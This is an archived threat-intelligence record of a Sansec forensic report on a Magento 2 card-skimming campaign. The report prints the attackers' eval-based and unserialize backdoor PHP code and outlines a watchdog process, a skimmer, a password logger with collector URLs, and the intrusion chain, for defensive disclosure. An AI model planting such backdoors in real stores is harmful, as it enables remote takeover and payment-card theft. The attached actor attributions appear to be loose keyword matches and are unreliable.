{ "id": "8c7a128a-bd0e-4568-90d1-e88eb3b446fa", "created_at": "2026-04-06T01:32:26.75229Z", "updated_at": "2026-04-10T13:11:51.378658Z", "deleted_at": null, "sha1_hash": "9029dc135c03bbdf18067d08d11a1fe234fd0c69", "title": "Hackers exploit security flaw right before Black Friday", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 614071, "plain_text": "Hackers exploit security flaw right before Black Friday\r\nBy Sansec Forensics Team\r\nPublished: 2020-12-02 ยท Archived: 2026-04-06 00:21:21 UTC\r\nThe affected stores were all running the older Magento 2.2, which is unsupported since December 2019.\r\nIn addition to the injected flaw, attackers used a hybrid skimming architecture, with front and back end malware\r\nworking in tandem. The added obfuscation \u0026 safeguarding measures make this the most complex skimming\r\noperation Sansec has identified this year.\r\nThanks to @RicTempesta, @giacmir and @vdloo_ for additional analysis.\r\nA persistent parasite\r\nEver bitten by a tick? Just removing the body will not prevent a nasty infection. As is the case with this campaign,\r\nwhere attackers injected multiple safeguarding mechanisms to secure their operations. The attack is extremely\r\ndifficult to get rid of, and most compromised merchants will see a reinfection within days after a cleanup.\r\nThis sophisticated attack consists of 4 components:\r\n1. a subtle POI security flaw functioning as backdoor\r\n2. a backdoor watchdog in the form of a hidden system process\r\n3. a CORS-defeating hybrid payment (Magecart) skimmer, using frontend and backend components, with an\r\ndiscrete PII-retrieval feature\r\n4. an admin password logger with remote exfiltration\r\nThe backdoor allows the attacker to inject future, more advanced code into the site. The watchdog ensures\r\nrecovery of the backdoor, should somebody remove it. And the admin password logger, well, logs passwords just\r\nin case.\r\nWe will describe each component here. Sansec has found all attacks to be hand-crafted for individual stores, so the\r\nmalware on your store may vary slightly.\r\nAre you affected? Our eComscan scanner detects all of the varieties that we have investigated so far.\r\nPart A: The Product Compare Backdoor\r\nSansec found two distinct backdoors added to the Product Compare functionality of Magento 2. Both are activated\r\nby sending a specially crafted POST to /catalog/product_compare/ . The first one is trivial and easily\r\ndetectable. If the product key matches, it will run the given products as executable code:\r\n// generated/code/Magento/Catalog/Controller/Product/Compare/Index/Interceptor.php\r\n$productContents = $this-\u003egetRequest()-\u003egetParam('product_contents');\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 1 of 7\n\n$productKey = $this-\u003egetRequest()-\u003egetParam('product_key');\r\nif($productContents != \"\" \u0026\u0026\r\n $productKey == \"ceedf557f7e6acb1f0025c07df235c555e2d9d808e7f6e6e64825a3d5bb2ee6d\") {\r\n $productValues = base64_decode($productContents);\r\n eval ($productValues);\r\n}\r\nThe second one is much more subtle, because it injects the PHP unserialize function. This feature is officially\r\ndeprecated, because it allows PHP Object Injection (POI) attacks. Previously, Sansec published dozens of POI\r\nattacks in eCommerce extensions. The use of unserialize may look benign to the casual observer, while it actually\r\nhands full control to anyone knocking on its door (with a properly crafted PHP object).\r\nAlso, the irony of a PHP Object Injection injection is not lost on us.\r\n// generated/code/Magento/Catalog/Controller/Product/Compare/Index/Interceptor.php\r\n$productContents = $this-\u003egetRequest()-\u003egetParam('product_contents');\r\nif($productContents != \"\") {\r\n $pluginData = new \\Zend\\Serializer\\Adapter\\PhpCode;\r\n $data = '\"plugInfo\";' . base64_decode($productContents);\r\n $pluginData-\u003eunserialize($data);\r\n}\r\nNB when this backdoor is used, it will trigger a warning in your logs (more info):\r\nWarning: Uses eval() The PhpCode adapter utilizes eval() to unserialize. This introduces both a performance and\r\nThe Zend\\Serializer\\Adapter\\PhpCode adapter generates a parsable PHP code representation using var_export(). To\r\nA similar but slightly different backdoor was found to be injected into app/autoload.php :\r\n$productKey = \"\";\r\nif (isset($_POST['product_key']))\r\n $productKey = $_POST['product_key'];\r\nif (isset($_POST['VENDOR_NEW_PATH_MAGE']) \u0026\u0026\r\n ($productKey != \"PRODUCT_KEY\") ) {\r\n $vendor_path = $_POST['VENDOR_NEW_PATH_MAGE'] ;\r\n $pr_func = \"base\". \"64_de\".\"code\";\r\n $path_data = $pr_func($vendor_path);\r\n eval ($path_data);\r\n}\r\nPart B: The Backdoor Watchdog\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 2 of 7\n\nAttackers may have started one or more background processes on your server that will monitor the presence of the\r\nmalware. Should the backdoor in Product Compare be removed, the original backdoor will get reinstalled.\r\nMeanwhile, the timestamps of all your files are reset, so that the odd timestamp will not cause any suspicion.\r\nThe backdoor watchdog is a compiled C process that is started from /pub/media . The process may have multiple\r\nnames that mimick legitimate system processes, such as:\r\ndnsadmin dormant\r\nsshd [net]\r\nphp-fpm: pool www\r\nThe actual executable is deleted from /pub/media but can be inspected via /proc/\u003cpid\u003e/exe . The watchdog\r\ncontains a hard copy of the actual backdoor (which can be inspected with strings /proc/\u003cpid\u003e/exe ). After\r\nreinjecting the backdoor, the watchdog will run find generated/ -type f -name \"*.php\" -exec touch {} to\r\nreset the timestamps.\r\nAdditionally, the watchdog process listens on TCP port 9000. We haven't investigated further, but it is likely\r\nanother out-of-bounds channel to receive commands by the malware owner.\r\nPro tip: quickly find any of these backdoor watchdogs by running:\r\nsudo grep -l Magento.Catalog /proc/*/exe\r\nPart C: The Magecart Payment Stealer\r\nThe skimmer is added to require.js or another static JS file on disk. It may show a fake payment form\r\n(customized for the specific shop) but in all cases, sends all of the intercepted data to /checkout . This is almost\r\nidentical to a normal transaction flow, so security monitoring systems will not raise any flags.\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 3 of 7\n\nThen on the server side, a payload handler is added to vendor/magento/module-customer/Model/Session.php . It\r\ncollects the payment data and saves it to a discrete location for later retrieval (such as\r\npub/media/tmp/design/file/default_luma_logo.jpg or pub/media/tmp/.gitignore ):\r\nThe stored credit card data is not retrieved directly, but via a generic POST (in most cases to / ). Here, the\r\nattacker first retrieves the stolen data (5628 bytes) and then truncates the temporary data storage.\r\n193.160.32.219 - \"POST / HTTP/1.0\" 200 5628 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537\r\n193.160.32.219 - \"POST / HTTP/1.1\" 200 5611 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.\r\n193.160.32.219 - \"POST / HTTP/1.0\" 200 20 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36\r\n193.160.32.219 - \"POST / HTTP/1.1\" 200 25 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36\r\nPart D: The Admin Password Logger\r\nWhile all these lines of defense look fairly impenetrable, the attackers added yet another safeguard. Should all of\r\ntheir access get revoked, they would still receive live copies of staff password, delivered to one of these collector\r\nURLs:\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 4 of 7\n\nhttps://www.wheelsonheels.co.uk/pub/health_check.php\r\nhttps://www.ledpro.com/pub/health_check.php\r\nhttps://zago-store.vn/pub/health_check.php\r\nRelevant code:\r\nBecause the password logger is initially added to vendor/magento/module-backend/Model/Auth.php , it will\r\nautomatically end up in generated/code/Magento/Backend/Model/Auth/Proxy.php every time the Magento 2\r\ncode is regenerated.\r\nAnother interesting bit is the presence of a getCredentialStorageChiper function. It would have looked like a\r\nbenign function, if only the author hadn't made the mistake of writing Chiper instead of Cipher .\r\nLuke reported one of these password loggers on Twitter last week.\r\nRoot cause analysis\r\nAll investigated targets were running Magento 2.2.3 up to 2.2.7. While it is widely used, the 2.2 branch is\r\nofficially deprecated and all stores are urged to upgrade to Magento 2.3 or 2.4.\r\nIn order to gain access to these stores in the first place, the attackers exploited multiple security issues that were\r\npatched in Magento version 2.1.17, 2.2.8 and 2.3.1.\r\n1. Retrieve hidden admin panel URL via information disclosure issue.\r\n2. Intercept logged-in administrator session key via SQL injection.\r\n3. Log in on the admin panel and create temporary email template, which can be exploited to run uploaded\r\nPHP code.\r\n4. Add backdoor\r\n5. ....possibly a long idle period\r\n6. Add skimmer\r\n7. Periodically retrieve intercepted payment data via POST to /\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 5 of 7\n\nAn observed attack chain:\r\nAttribution\r\nSansec observed the following IPs that either injected malware or retrieved intercepted data:\r\n104.129.16.8\r\n104.168.14.206\r\n107.172.97.122\r\n155.94.198.5\r\n167.88.61.117\r\n167.88.61.176\r\n167.88.61.176\r\n185.152.67.39\r\n185.154.13.210\r\n193.160.32.219\r\n198.255.66.27\r\n2.58.45.2\r\n50.7.159.34\r\n66.154.104.2\r\n66.154.105.2\r\n66.212.20.8\r\n67.88.61.176\r\n87.166.53.100\r\n96.44.161.8\r\nRecommendations\r\nSansec recommends all affected merchants to engage a forensic investigate and cleanup. We have provided a\r\nchecklist for your convenience. Our flagship software eComscan will help your team right now with the\r\ninvestigation, and will also help to prevent future incidents.\r\nHeader image by Erik Karits\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 6 of 7\n\nRead more\r\nMass PolyShell attack wave hits 471 stores in one hour\r\nNovel WebRTC skimmer bypasses security controls at $100+ billion car maker\r\nPolyShell: unrestricted file upload in Magento and Adobe Commerce\r\nDigital skimmer hits global supermarket chain\r\nBuilding a faster YARA engine in pure Go\r\nSource: https://sansec.io/research/magento-2-persistent-parasite\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://sansec.io/research/magento-2-persistent-parasite" ], "report_names": [ "magento-2-persistent-parasite" ], "threat_actors": [ { "id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed", "created_at": "2023-01-06T13:46:38.814104Z", "updated_at": "2026-04-10T02:00:03.110104Z", "deleted_at": null, "main_name": "MageCart", "aliases": [], "source_name": "MISPGALAXY:MageCart", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439146, "ts_updated_at": 1775826711, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9029dc135c03bbdf18067d08d11a1fe234fd0c69.pdf", "text": "https://archive.orkl.eu/9029dc135c03bbdf18067d08d11a1fe234fd0c69.txt", "img": "https://archive.orkl.eu/9029dc135c03bbdf18067d08d11a1fe234fd0c69.jpg" } }